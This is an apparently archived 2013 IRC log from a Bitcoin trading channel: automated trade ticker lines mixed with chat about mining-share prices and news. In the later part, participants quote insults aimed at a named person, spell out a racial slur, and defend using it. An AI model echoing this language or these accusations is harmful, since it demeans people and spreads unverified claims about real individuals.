@ 0.00166 = 0.0116 BTC [+] Jun 29 20:10:57 [BTCTC] [AMC-PT] 212 @ 0.0017 = 0.3604 BTC [+] Jun 29 20:10:58 [BTCTC] [AMC-PT] 859 @ 0.001799 = 1.5453 BTC [+] Jun 29 20:11:00 [BTCTC] [AMC-PT] 1993 @ 0.0018 = 3.5874 BTC [+] Jun 29 20:11:26 [BTCTC] [AMC-PT] 650 @ 0.0012 = 0.78 BTC [-] Jun 29 20:11:30 [BTCTC] [TAT.ASICMINER] 25 @ 0.0397 = 0.9925 BTC [+] Jun 29 20:13:46 [MPEX] [S.MPOE] 10393 @ 0.00082337 = 8.5573 BTC [-] Jun 29 20:14:23 so like 25bn in bond redemptions Jun 29 20:14:32 teh world economy is deleveraging at an accelerating rate. Jun 29 20:14:49 [BTCTC] [COGNITIVE] 1 @ 0.508 BTC [-] Jun 29 20:14:53 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [-] Jun 29 20:15:26 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199 = 0.597 BTC [-] Jun 29 20:16:19 [BTCTC] [AMC-PT] 850 @ 0.0012 = 1.02 BTC [-] Jun 29 20:16:34 [BTCTC] [AMC-PT] 7 @ 0.001119 = 0.0078 BTC [-] Jun 29 20:16:36 [BTCTC] [AMC-PT] 42 @ 0.001118 = 0.047 BTC [-] Jun 29 20:16:37 [BTCTC] [AMC-PT] 10 @ 0.001118 = 0.0112 BTC [-] Jun 29 20:16:39 [BTCTC] [AMC-PT] 2 @ 0.001114 = 0.0022 BTC [-] Jun 29 20:16:39 [BTCTC] [AMC-PT] 15 @ 0.001114 = 0.0167 BTC [-] Jun 29 20:16:40 [BTCTC] [AMC-PT] 50 @ 0.001113 = 0.0557 BTC [-] Jun 29 20:16:42 [BTCTC] [AMC-PT] 100 @ 0.001113 = 0.1113 BTC [-] Jun 29 20:16:43 [BTCTC] [AMC-PT] 50 @ 0.001112 = 0.0556 BTC [-] Jun 29 20:16:44 [BTCTC] [AMC-PT] 5 @ 0.001112 = 0.0056 BTC [-] Jun 29 20:16:46 [BTCTC] [AMC-PT] 75 @ 0.001112 = 0.0834 BTC [-] Jun 29 20:16:47 [BTCTC] [AMC-PT] 267 @ 0.001111 = 0.2966 BTC [-] Jun 29 20:16:49 [BTCTC] [TAT.ASICMINER] 1 @ 0.0397 BTC [+] Jun 29 20:16:50 [BTCTC] [TAT.ASICMINER] 24 @ 0.0397 = 0.9528 BTC [+] Jun 29 20:18:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0397 = 0.0794 BTC [+] Jun 29 20:18:23 [HAVELOCK] [ASICM] 100 @ 0.037 = 3.7 BTC [+] Jun 29 20:18:44 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Jun 29 20:20:34 [BTCTC] [TAT.ASICMINER] 42 @ 0.03969 = 1.667 BTC [-] Jun 29 20:20:36 [BTCTC] [TAT.ASICMINER] 17 @ 0.03969 = 0.6747 BTC [-] Jun 29 20:21:13 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Jun 29 20:21:39 [BTCTC] [B.YABMC] 4 @ 0.005597 = 0.0224 BTC [+] Jun 29 20:23:09 [BTCTC] [ASICMINER-PT] 2 @ 3.897 = 7.794 BTC [+] Jun 29 20:23:16 [MPEX] [S.MPOE] 1000 @ 0.00082451 = 0.8245 BTC [+] Jun 29 20:24:02 [BTCTC] [ASICMINER-PT] 5 @ 3.898 = 19.49 BTC [+] Jun 29 20:24:38 [BTCTC] [BASIC-MINING] 70 @ 0.161001 = 11.2701 BTC [-] Jun 29 20:25:01 is the world getting goxed too? Jun 29 20:25:48 [HAVELOCK] [ASICM] 600 @ 0.0375 = 22.5 BTC [+] Jun 29 20:25:49 ;;ticker Jun 29 20:25:50 MtGox BTCUSD ticker | Best bid: 96.10001, Best ask: 96.66999, Bid-ask spread: 0.56998, Last trade: 96.10001, 24 hour volume: 34800.16511274, 24 hour low: 92.25000, 24 hour high: 100.43980, 24 hour vwap: 96.03832 Jun 29 20:26:49 [MPEX] [S.MPOE] 8810 @ 0.00082337 = 7.2539 BTC [-] Jun 29 20:26:51 [MPEX] [S.MPOE] 13600 @ 0.00082317 = 11.1951 BTC [-] Jun 29 20:26:52 xmas present for mpoe-pr - http://teespring.com/50friedcat Jun 29 20:27:01 [MPEX] [S.MPOE] 4584 @ 0.00082246 = 3.7702 BTC [-] Jun 29 20:27:02 [MPEX] [S.MPOE] 1286 @ 0.00082135 = 1.0563 BTC [-] Jun 29 20:27:25 [BTCTC] [BASIC-MINING] 22 @ 0.161001 = 3.542 BTC [-] Jun 29 20:27:33 [BTCTC] [TAT.ASICMINER] 20 @ 0.039649 = 0.793 BTC [-] Jun 29 20:28:13 [BTCTC] [BASIC-MINING] 8 @ 0.161001 = 1.288 BTC [-] Jun 29 20:28:15 [BTCTC] [BASIC-MINING] 10 @ 0.161 = 1.61 BTC [-] Jun 29 20:28:17 [BTCTC] [BASIC-MINING] 7 @ 0.16 = 1.12 BTC [-] Jun 29 20:28:27 [BTCTC] [TAT.ASICMINER] 89 @ 0.039649 = 3.5288 BTC [-] Jun 29 20:28:40 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005157 BTC [+] Jun 29 20:28:42 [BTCTC] [TAT.VIRTUALMINE] 98 @ 0.005671 = 0.5558 BTC [+] Jun 29 20:28:42 [BTCTC] [TAT.VIRTUALMINE] 98 @ 0.005672 = 0.5559 BTC [+] Jun 29 20:28:43 [BTCTC] [TAT.VIRTUALMINE] 67 @ 0.0057 = 0.3819 BTC [+] Jun 29 20:28:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.00572 BTC [+] Jun 29 20:28:46 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005947 = 0.0119 BTC [+] Jun 29 20:28:47 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.005948 = 0.5948 BTC [+] Jun 29 20:28:48 [BTCTC] [TAT.VIRTUALMINE] 500 @ 0.00595 = 2.975 BTC [+] Jun 29 20:28:49 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.00595 = 1.785 BTC [+] Jun 29 20:28:55 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [+] Jun 29 20:29:41 [HAVELOCK] [ASICM] 100 @ 0.0375 = 3.75 BTC [+] Jun 29 20:30:21 [BTCTC] [DMS.MINING] 12 @ 0.022999 = 0.276 BTC [+] Jun 29 20:30:23 [BTCTC] [DMS.MINING] 2 @ 0.0232 = 0.0464 BTC [+] Jun 29 20:30:23 [BTCTC] [DMS.MINING] 36 @ 0.023366 = 0.8412 BTC [+] Jun 29 20:30:25 [BTCTC] [DMS.MINING] 3 @ 0.0235 = 0.0705 BTC [+] Jun 29 20:30:26 [BTCTC] [B.YABMC] 10 @ 0.005598 = 0.056 BTC [+] Jun 29 20:30:27 [BTCTC] [DMS.MINING] 50 @ 0.0235 = 1.175 BTC [+] Jun 29 20:30:52 [BTCTC] [DMS.MINING] 111 @ 0.0235 = 2.6085 BTC [+] Jun 29 20:30:56 [BTCTC] [B.YABMC] 4 @ 0.0056 = 0.0224 BTC [+] Jun 29 20:30:58 [BTCTC] [B.YABMC] 1 @ 0.00569 BTC [+] Jun 29 20:31:20 [BTCTC] [ASICMINER-PT] 1 @ 3.899 BTC [+] Jun 29 20:31:25 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Jun 29 20:31:27 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Jun 29 20:31:27 [BTCTC] [DMS.SELLING] 20 @ 0.031301 = 0.626 BTC [-] Jun 29 20:31:30 [BTCTC] [DMS.SELLING] 18 @ 0.031301 = 0.5634 BTC [-] Jun 29 20:31:32 [BTCTC] [DMS.SELLING] 25 @ 0.0313 = 0.7825 BTC [-] Jun 29 20:31:33 [BTCTC] [DMS.SELLING] 27 @ 0.0312 = 0.8424 BTC [-] Jun 29 20:32:13 [BTCTC] [AMC-PT] 5 @ 0.0015 = 0.0075 BTC [+] Jun 29 20:32:16 [BTCTC] [DMS.PURCHASE] 115 @ 0.053474 = 6.1495 BTC [+] Jun 29 20:34:35 [BTCTC] [BTC-BOND] 234 @ 0.01 = 2.34 BTC [+] Jun 29 20:35:12 [BTCTC] [AMC-PT] 5 @ 0.00115 = 0.0058 BTC [-] Jun 29 20:35:14 [BTCTC] [AMC-PT] 100 @ 0.00115 = 0.115 BTC [-] Jun 29 20:35:16 [BTCTC] [AMC-PT] 1323 @ 0.001131 = 1.4963 BTC [-] Jun 29 20:35:18 [BTCTC] [B.YABMC] 25 @ 0.005698 = 0.1425 BTC [+] Jun 29 20:35:19 [BTCTC] [AMC-PT] 5 @ 0.00113 = 0.0057 BTC [-] Jun 29 20:35:20 [BTCTC] [AMC-PT] 40 @ 0.001119 = 0.0448 BTC [-] Jun 29 20:35:22 [BTCTC] [AMC-PT] 9733 @ 0.001111 = 10.8134 BTC [-] Jun 29 20:35:23 [BTCTC] [AMC-PT] 800 @ 0.001111 = 0.8888 BTC [-] Jun 29 20:35:33 [HAVELOCK] [ASICM] 33 @ 0.0375 = 1.2375 BTC [+] Jun 29 20:36:12 [BTCTC] [TAT.ASICMINER] 9 @ 0.039397 = 0.3546 BTC [-] Jun 29 20:36:38 [HAVELOCK] [ASICM] 200 @ 0.037 = 7.4 BTC [-] Jun 29 20:36:39 [HAVELOCK] [ASICM] 5 @ 0.036501 = 0.1825 BTC [-] Jun 29 20:36:41 [HAVELOCK] [ASICM] 45 @ 0.0365 = 1.6425 BTC [-] Jun 29 20:36:48 [BTCTC] [B.YABMC] 1 @ 0.005698 BTC [+] Jun 29 20:36:56 [BTCTC] [BASIC-MINING] 3 @ 0.16 = 0.48 BTC [-] Jun 29 20:36:57 [BTCTC] [BASIC-MINING] 4 @ 0.16 = 0.64 BTC [-] Jun 29 20:37:12 [BTCTC] [BASIC-MINING] 1 @ 0.160001 BTC [+] Jun 29 20:37:14 [BTCTC] [BASIC-MINING] 6 @ 0.16 = 0.96 BTC [-] Jun 29 20:37:15 [BTCTC] [BASIC-MINING] 1 @ 0.15992 BTC [-] Jun 29 20:37:17 [BTCTC] [BASIC-MINING] 1 @ 0.125 BTC [-] Jun 29 20:37:18 [BTCTC] [BASIC-MINING] 6 @ 0.120001 = 0.72 BTC [-] Jun 29 20:37:22 [BTCTC] [AMC-PT] 100 @ 0.001111 = 0.1111 BTC [-] Jun 29 20:37:24 [BTCTC] [AMC-PT] 1495 @ 0.001001 = 1.4965 BTC [-] Jun 29 20:37:28 [BTCTC] [AMC-PT] 3000 @ 0.001 = 3 BTC [-] Jun 29 20:37:30 [BTCTC] [AMC-PT] 10 @ 0.001 = 0.01 BTC [-] Jun 29 20:37:30 [BTCTC] [AMC-PT] 5000 @ 0.001 = 5 BTC [-] Jun 29 20:37:32 [BTCTC] [AMC-PT] 150 @ 0.001 = 0.15 BTC [-] Jun 29 20:37:33 [BTCTC] [AMC-PT] 100 @ 0.001 = 0.1 BTC [-] Jun 29 20:37:34 [BTCTC] [AMC-PT] 5 @ 0.001 = 0.005 BTC [-] Jun 29 20:37:56 [BTCTC] [ASICMINER-PT] 2 @ 3.899 = 7.798 BTC [-] Jun 29 20:37:58 [BTCTC] [ASICMINER-PT] 2 @ 3.9 = 7.8 BTC [+] Jun 29 20:38:00 [BTCTC] [ASICMINER-PT] 1 @ 3.9 BTC [+] Jun 29 20:38:02 [BTCTC] [ASICMINER-PT] 2 @ 3.94 = 7.88 BTC [+] Jun 29 20:38:40 [BTCTC] [TAT.ASICMINER] 29 @ 0.039397 = 1.1425 BTC [-] Jun 29 20:38:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.038001 = 0.152 BTC [-] Jun 29 20:38:56 ThickAsThieves: so you're a georgia boy Jun 29 20:38:58 do you have an accent? Jun 29 20:39:09 [BTCTC] [AMC-PT] 1 @ 0.0015 BTC [+] Jun 29 20:39:10 or are you truly a yankee? Jun 29 20:39:50 [BTCTC] [LTC-MINING] 1 @ 0.292 BTC [-] Jun 29 20:41:13 [BTCTC] [ASICMINER-PT] 1 @ 3.938 BTC [-] Jun 29 20:43:28 he's a miami boy Jun 29 20:43:37 i'm a yankee Jun 29 20:43:42 living in FL Jun 29 20:44:01 originally from New England Jun 29 20:44:10 he's a yank from nj Jun 29 20:45:50 [HAVELOCK] [ASICM] 17 @ 0.0375 = 0.6375 BTC [+] Jun 29 20:45:54 [HAVELOCK] [ASICM] 100 @ 0.0375 = 3.75 BTC [+] Jun 29 20:46:10 nope Jun 29 20:46:20 [BTCTC] [AMC-PT] 496 @ 0.00135 = 0.6696 BTC [-] Jun 29 20:48:33 I win: 2013-06-29 12:26:33 SELL: (TAT.ASICMINER): 19 @ ฿0.04000000/ea Jun 29 20:56:27 [BTCTC] [TAT.ASICMINER] 22 @ 0.039359 = 0.8659 BTC [+] Jun 29 20:56:46 [HAVELOCK] [ASICM] 100 @ 0.03799 = 3.799 BTC [+] Jun 29 20:56:57 [HAVELOCK] [ASICM] 58 @ 0.037998 = 2.2039 BTC [+] Jun 29 20:57:04 [HAVELOCK] [ASICM] 5 @ 0.037998 = 0.19 BTC [+] Jun 29 20:57:11 [HAVELOCK] [ASICM] 500 @ 0.038 = 19 BTC [+] Jun 29 20:57:13 [HAVELOCK] [ASICM] 250 @ 0.038 = 9.5 BTC [+] Jun 29 20:58:30 [HAVELOCK] [ASICM] 38 @ 0.03889999 = 1.4782 BTC [+] Jun 29 20:58:43 [HAVELOCK] [ASICM] 200 @ 0.03899999 = 7.8 BTC [+] Jun 29 21:00:11 [BTCTC] [AMC-PT] 100 @ 0.0012 = 0.12 BTC [-] Jun 29 21:00:27 [MPEX] [S.MPOE] 13800 @ 0.00082451 = 11.3782 BTC [+] Jun 29 21:00:34 [BTCTC] [TAT.VIRTUALMINE] 15 @ 0.005097 = 0.0765 BTC [-] Jun 29 21:01:11 [BTCTC] [ASICMINER-PT] 1 @ 3.939 BTC [+] Jun 29 21:01:13 [BTCTC] [DMS.PURCHASE] 55 @ 0.053474 = 2.9411 BTC [+] Jun 29 21:01:17 [BTCTC] [ASICMINER-PT] 11 @ 3.939 = 43.329 BTC [+] Jun 29 21:02:06 [BTCTC] [TAT.VIRTUALMINE] 30 @ 0.005094 = 0.1528 BTC [-] Jun 29 21:02:08 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.005093 = 0.1273 BTC [-] Jun 29 21:02:09 [BTCTC] [TAT.VIRTUALMINE] 21 @ 0.005092 = 0.1069 BTC [-] Jun 29 21:02:11 [BTCTC] [ASICMINER-PT] 1 @ 3.939 BTC [+] Jun 29 21:03:00 [BTCTC] [TAT.VIRTUALMINE] 206 @ 0.005092 = 1.049 BTC [-] Jun 29 21:03:01 [BTCTC] [TAT.VIRTUALMINE] 300 @ 0.005 = 1.5 BTC [-] Jun 29 21:04:12 [HAVELOCK] [HIM] 1 @ 0.26800505 BTC [-] Jun 29 21:04:36 [BTCTC] [DMS.PURCHASE] 49 @ 0.053474 = 2.6202 BTC [+] Jun 29 21:04:47 [HAVELOCK] [ASICM] 7 @ 0.039 = 0.273 BTC [+] Jun 29 21:06:12 [HAVELOCK] [ASICM] 7 @ 0.03889999 = 0.2723 BTC [-] Jun 29 21:06:14 [HAVELOCK] [ASICM] 37 @ 0.039 = 1.443 BTC [+] Jun 29 21:08:40 [BTCTC] [TAT.ASICMINER] 4 @ 0.03933 = 0.1573 BTC [-] Jun 29 21:11:54 [BTCTC] [ASICMINER-PT] 1 @ 3.89 BTC [-] Jun 29 21:12:30 [BTCTC] [TAT.ASICMINER] 29 @ 0.0393 = 1.1397 BTC [-] Jun 29 21:12:32 [BTCTC] [TAT.ASICMINER] 21 @ 0.03932 = 0.8257 BTC [+] Jun 29 21:12:32 hehehe https://bitcointalk.org/index.php?topic=242962.msg2613454#msg2613454 Jun 29 21:12:33 [HAVELOCK] [ASICM] 7 @ 0.039 = 0.273 BTC [+] Jun 29 21:12:51 [HAVELOCK] [ASICM] 35 @ 0.03889999 = 1.3615 BTC [-] Jun 29 21:13:14 [HAVELOCK] [ASICM] 2 @ 0.03995 = 0.0799 BTC [+] Jun 29 21:13:22 [HAVELOCK] [ASICM] 8 @ 0.03995 = 0.3196 BTC [+] Jun 29 21:13:41 I got my first conversion from the just-dice.com ad Jun 29 21:14:46 technically havelock's conversion Jun 29 21:15:00 since he bought shares at market not from my issue Jun 29 21:19:46 [HAVELOCK] [ASICM] 7 @ 0.03995 = 0.2797 BTC [+] Jun 29 21:20:30 [HAVELOCK] [ASICM] 83 @ 0.03995 = 3.3159 BTC [+] Jun 29 21:20:47 lol Jun 29 21:20:48 [HAVELOCK] [ASICM] 10 @ 0.03999 = 0.3999 BTC [+] Jun 29 21:21:17 [HAVELOCK] [ASICM] 7 @ 0.03999 = 0.2799 BTC [+] Jun 29 21:21:48 [BTCTC] [ASICMINER-PT] 1 @ 3.9001 BTC [+] Jun 29 21:21:52 [BTCTC] [ASICMINER-PT] 18 @ 3.9 = 70.2 BTC [-] Jun 29 21:21:57 [BTCTC] [ASICMINER-PT] 1 @ 3.821714 BTC [-] Jun 29 21:22:39 [BTCTC] [S.MPOE-PT] 2 @ 0.000853 = 0.0017 BTC [-] Jun 29 21:22:41 [BTCTC] [S.MPOE-PT] 18 @ 0.000851 = 0.0153 BTC [-] Jun 29 21:23:42 [BTCTC] [DMS.MINING] 12 @ 0.022001 = 0.264 BTC [-] Jun 29 21:23:45 [BTCTC] [DMS.MINING] 26 @ 0.022 = 0.572 BTC [-] Jun 29 21:26:34 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Jun 29 21:26:40 [BTCTC] [BASIC-MINING] 1 @ 0.22 BTC [+] Jun 29 21:26:46 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [+] Jun 29 21:27:10 [BTCTC] [TAT.ASICMINER] 6 @ 0.039285 = 0.2357 BTC [-] Jun 29 21:27:12 [BTCTC] [TAT.ASICMINER] 4 @ 0.039286 = 0.1571 BTC [+] Jun 29 21:27:45 [BTCTC] [DMS.SELLING] 3 @ 0.0312 = 0.0936 BTC [-] Jun 29 21:27:47 [BTCTC] [DMS.SELLING] 16 @ 0.0312 = 0.4992 BTC [-] Jun 29 21:28:07 [BTCTC] [TAT.ASICMINER] 16 @ 0.039284 = 0.6285 BTC [-] Jun 29 21:28:19 [BTCTC] [DMS.PURCHASE] 30 @ 0.053474 = 1.6042 BTC [+] Jun 29 21:29:28 [HAVELOCK] [ASICM] 100 @ 0.0391 = 3.91 BTC [-] Jun 29 21:30:13 [HAVELOCK] [ASICM] 19 @ 0.039001 = 0.741 BTC [-] Jun 29 21:30:14 [HAVELOCK] [ASICM] 140 @ 0.039 = 5.46 BTC [-] Jun 29 21:31:02 [HAVELOCK] [ASICM] 3 @ 0.03889999 = 0.1167 BTC [-] Jun 29 21:32:16 [BTCTC] [DMS.MINING] 10 @ 0.02105 = 0.2105 BTC [-] Jun 29 21:32:18 [BTCTC] [DMS.MINING] 94 @ 0.021001 = 1.9741 BTC [-] Jun 29 21:32:41 [BTCTC] [TAT.ASICMINER] 5 @ 0.039284 = 0.1964 BTC [-] Jun 29 21:33:24 [BTCTC] [B.YABMC] 1 @ 0.005015 BTC [-] Jun 29 21:33:46 [MPEX] [S.MPOE] 13864 @ 0.00082135 = 11.3872 BTC [-] Jun 29 21:34:01 [MPEX] [S.MPOE] 5100 @ 0.00082125 = 4.1884 BTC [-] Jun 29 21:35:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.038102 BTC [-] Jun 29 21:37:04 http://www.reuters.com/article/2013/06/29/us-usa-eu-spying-idUSBRE95S0AQ20130629 Jun 29 21:37:09 U.S. bugged EU offices, computer networks: German magazine Jun 29 21:37:34 erryone on dat security audit tip Jun 29 21:38:12 cracks me up how for months the drumbeat was around how the us was constantly under attack from sino-based APTs Jun 29 21:38:25 then prism Jun 29 21:39:02 then everyone's sysadmin spends a few shitbucks on a security audit to discover american hax everywhere Jun 29 21:39:29 [BTCTC] [ASICMINER-PT] 1 @ 3.908999 BTC [+] Jun 29 21:39:31 [BTCTC] [ASICMINER-PT] 1 @ 3.909 BTC [+] Jun 29 21:40:15 [HAVELOCK] [ASICM] 1 @ 0.0388 BTC [-] Jun 29 21:45:35 [BTCTC] [TAT.ASICMINER] 28 @ 0.039 = 1.092 BTC [+] Jun 29 21:46:14 [BTCTC] [TAT.ASICMINER] 4 @ 0.0391 = 0.1564 BTC [+] Jun 29 21:50:37 um, what's up with asicminer? just nuttiness? Jun 29 21:50:45 or did i miss some news Jun 29 21:50:59 [BTCTC] [TAT.ASICMINER] 1 @ 0.039 BTC [-] Jun 29 21:51:55 there was allegedly a presentation somewhere in china Jun 29 21:51:59 [HAVELOCK] [ASICM] 1 @ 0.038999 BTC [+] Jun 29 21:52:01 where questions were answered Jun 29 21:52:26 question included a statement that AM will deploy 800-1000TH this year Jun 29 21:52:36 wow, i'm tempted to cash some out Jun 29 21:52:51 'sell the news' Jun 29 21:53:10 [HAVELOCK] [ASICM] 17 @ 0.038999 = 0.663 BTC [+] Jun 29 21:53:45 this could also be the rumor Jun 29 21:53:49 but is the news going to be ASICMINER BREAKS 4 PER SHARE Jun 29 21:53:53 [HAVELOCK] [ASICM] 9 @ 0.039 = 0.351 BTC [+] Jun 29 21:53:55 [HAVELOCK] [ASICM] 1 @ 0.039 BTC [+] Jun 29 21:53:58 then i sell at 8, lol Jun 29 21:54:37 that next week's dividend is always a temptation to hold on Jun 29 21:54:40 [HAVELOCK] [ASICM] 15 @ 0.0391 = 0.5865 BTC [+] Jun 29 21:55:11 [HAVELOCK] [ASICM] 5 @ 0.0391 = 0.1955 BTC [+] Jun 29 21:55:15 this one will certainly be higher than the last two Jun 29 21:57:08 [BTCTC] [TAT.ASICMINER] 25 @ 0.0386 = 0.965 BTC [-] Jun 29 21:58:36 [BTCTC] [TAT.ASICMINER] 30 @ 0.0386 = 1.158 BTC [-] Jun 29 21:59:29 seems i'll hold for now like the rest of the suckers Jun 29 21:59:31 :) Jun 29 22:02:10 this also assumes they dont withold divs to pay for those 100000000TH Jun 29 22:02:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.03895 = 0.0779 BTC [+] Jun 29 22:02:45 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005002 BTC [+] Jun 29 22:04:20 [BTCTC] [TAT.ASICMINER] 10 @ 0.03895 = 0.3895 BTC [+] Jun 29 22:05:02 then everyone's sysadmin spends a few shitbucks on a security audit to discover american hax everywhere <<< Jun 29 22:09:04 [BTCTC] [TAT.ASICMINER] 52 @ 0.03894 = 2.0249 BTC [-] Jun 29 22:14:54 [BTCTC] [AMC-PT] 15 @ 0.00135 = 0.0203 BTC [+] Jun 29 22:15:11 [BTCTC] [TAT.ASICMINER] 30 @ 0.0391 = 1.173 BTC [+] Jun 29 22:16:46 [BTCTC] [ASICMINER-PT] 1 @ 3.919 BTC [+] Jun 29 22:16:49 [BTCTC] [ASICMINER-PT] 1 @ 3.938 BTC [+] Jun 29 22:16:51 [BTCTC] [ASICMINER-PT] 2 @ 3.9399 = 7.8798 BTC [+] Jun 29 22:16:53 [BTCTC] [ASICMINER-PT] 2 @ 3.944 = 7.888 BTC [+] Jun 29 22:16:54 [BTCTC] [ASICMINER-PT] 4 @ 3.947 = 15.788 BTC [+] Jun 29 22:17:13 [BTCTC] [AMC-PT] 12 @ 0.00135 = 0.0162 BTC [+] Jun 29 22:19:22 mp have you seen this thread? Jun 29 22:19:25 pretty funny Jun 29 22:19:26 https://bitcointalk.org/index.php?topic=216280.0 Jun 29 22:19:34 List of ongoing scams Jun 29 22:19:36 MPEX - Despite the fact that the security never actually stole or scammed members the owner Mircea Popescu is a disgusting person that uses the term "nigger" on his blog while also constantly putting people down and generally being a complete snob. Lied multiple times about being the owner of a successful company, if it wasn't for Satoshidice releasing stock in MPEX this person would Jun 29 22:19:36 be selling potatoes somewhere in Romania. Jun 29 22:20:04 you are scamming their morality Jun 29 22:20:08 stahp Jun 29 22:20:56 BitBet.us - Seemingly innocent but will scam and make money off large bets, forum member MPOE-PR is related to the scam, SatoshiDice is also related to the people who run the scam. The group of people that run the scam are mostly trashy, condescending and prideful for a reason that shall remain a mystery to us. It appears that this is the reason why the reputation of SatoshiDice was Jun 29 22:20:57 questioned by other forum members like "mem". Jun 29 22:21:44 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005985 BTC [+] Jun 29 22:22:08 lmao Jun 29 22:23:00 you rang, mp? Jun 29 22:23:48 "Mircea is a proven liar and an elitist idiot, just read his blog, quite fascinating to feel inside of the mind of a douchebag for 5 minutes" Jun 29 22:23:59 "people are evil because they laugh at me!!!!" Jun 29 22:24:06 benkay_ just liked the quote Jun 29 22:24:09 [BTCTC] [ASICMINER-PT] 1 @ 3.946 BTC [-] Jun 29 22:24:19 o hai :) Jun 29 22:24:33 you tried therfore noone can criticize you goes only one way it seems Jun 29 22:24:42 [MPEX] [S.MPOE] 2751 @ 0.00082262 = 2.263 BTC [+] Jun 29 22:24:56 [MPEX] [S.MPOE] 7800 @ 0.00082125 = 6.4058 BTC [-] Jun 29 22:24:58 [MPEX] [S.MPOE] 299 @ 0.00082029 = 0.2453 BTC [-] Jun 29 22:25:43 kakobrekla you may not try things like saying nigger to see what happens. Jun 29 22:25:52 there's an approved list of things to try. juggling, for instance. Jun 29 22:26:11 any form of navel grazing is generally safe. Jun 29 22:26:46 i graze my livestock on my navel Jun 29 22:26:47 regularly Jun 29 22:27:21 afids livestock ftw. Jun 29 22:27:29 they are small Jun 29 22:27:48 but the few drops of sugar they poop every day taste all the better for being 100% carbon neutral Jun 29 22:27:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.0391 = 0.9775 BTC [+] Jun 29 22:28:03 i am building a sustainability loop in my bellybutton Jun 29 22:28:24 ;;nethash Jun 29 22:28:25 163540.999989 Jun 29 22:28:30 the us human services subdept of teh dept of hail satan depends on you! Jun 29 22:28:54 i am sustaining a very small welfare pool Jun 29 22:29:03 actually it's not welfare at all Jun 29 22:29:12 the ants that maintain the aphids in my bellybutton work hard for their sugar Jun 29 22:29:16 [BTCTC] [TAT.ASICMINER] 48 @ 0.0388 = 1.8624 BTC [-] Jun 29 22:29:17 it's not welfare, it's bellyfare Jun 29 22:29:58 you really should stop using the n-word though lol Jun 29 22:30:00 i tried to do welfare, but the productive members of my bellybutton farm felt dragged down by the underclasses that rapidly accreted Jun 29 22:30:15 thestringpuller why ? Jun 29 22:30:39 [BTCTC] [ASICMINER-PT] 1 @ 3.946 BTC [-] Jun 29 22:30:55 it's unnecessarily inflammatory even if not used in a racist context Jun 29 22:30:58 because he owns shares in things traded on mpex and wants to see them go up Jun 29 22:31:08 lol Jun 29 22:31:13 i on the other hand encourage further incendiary talk Jun 29 22:31:19 depresses prices, yo Jun 29 22:31:29 the stronger a word is the better it is. what's this notion of only using bland words ?! we're not trying to be boring Jun 29 22:31:40 [MPEX] [S.MPOE] 6551 @ 0.00082029 = 5.3737 BTC [-] Jun 29 22:31:51 [MPEX] [S.MPOE] 449 @ 0.00082014 = 0.3682 BTC [-] Jun 29 22:31:54 lol Jun 29 22:32:56 for that matter, asking this is akin to asking girls to please wear burkas, as their nude hair is inflamatory to men generally Jun 29 22:33:16 [BTCTC] [ASICMINER-PT] 1 @ 3.974 BTC [+] Jun 29 22:33:23 [HAVELOCK] [ASICM] 47 @ 0.038501 = 1.8095 BTC [-] Jun 29 22:33:24 [HAVELOCK] [ASICM] 1 @ 0.0385 BTC [-] Jun 29 22:33:26 [HAVELOCK] [ASICM] 100 @ 0.038101 = 3.8101 BTC [-] Jun 29 22:34:14 [BTCTC] [TAT.ASICMINER] 1 @ 0.0391 BTC [+] Jun 29 22:34:16 [BTCTC] [TAT.ASICMINER] 2 @ 0.0393 = 0.0786 BTC [+] Jun 29 22:34:18 [BTCTC] [TAT.ASICMINER] 25 @ 0.03933 = 0.9833 BTC [+] Jun 29 22:34:18 [BTCTC] [TAT.ASICMINER] 5 @ 0.03933 = 0.1967 BTC [+] Jun 29 22:34:20 [BTCTC] [TAT.ASICMINER] 51 @ 0.03963 = 2.0211 BTC [+] Jun 29 22:34:21 [BTCTC] [TAT.ASICMINER] 4 @ 0.03969 = 0.1588 BTC [+] Jun 29 22:34:54 [BTCTC] [DMS.SELLING] 20 @ 0.033869 = 0.6774 BTC [+] Jun 29 22:34:57 [MPEX] [S.MPOE] [PAID] 126.23863023 BTC to 500`000`000 shares, 25 satoshi per share Jun 29 22:35:09 wow i managed to do this right for once. Jun 29 22:35:10 [BTCTC] [DMS.SELLING] 25 @ 0.03387 = 0.8468 BTC [+] Jun 29 22:35:13 [BTCTC] [DMS.SELLING] 100 @ 0.03388 = 3.388 BTC [+] Jun 29 22:35:20 ? Jun 29 22:35:24 [BTCTC] [TAT.ASICMINER] 5 @ 0.03969 = 0.1985 BTC [+] Jun 29 22:35:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03969 BTC [+] Jun 29 22:35:43 [BTCTC] [TAT.ASICMINER] 25 @ 0.03969 = 0.9923 BTC [+] Jun 29 22:36:17 [BTCTC] [DMS.SELLING] 17 @ 0.033888 = 0.5761 BTC [+] Jun 29 22:36:18 [BTCTC] [ASICMINER-PT] 1 @ 3.973 BTC [-] Jun 29 22:36:20 [BTCTC] [ASICMINER-PT] 1 @ 3.974 BTC [+] Jun 29 22:36:23 [BTCTC] [ASICMINER-PT] 1 @ 3.975 BTC [+] Jun 29 22:36:25 [BTCTC] [ASICMINER-PT] 11 @ 3.9759 = 43.7349 BTC [+] Jun 29 22:36:27 [BTCTC] [ASICMINER-PT] 5 @ 3.976 = 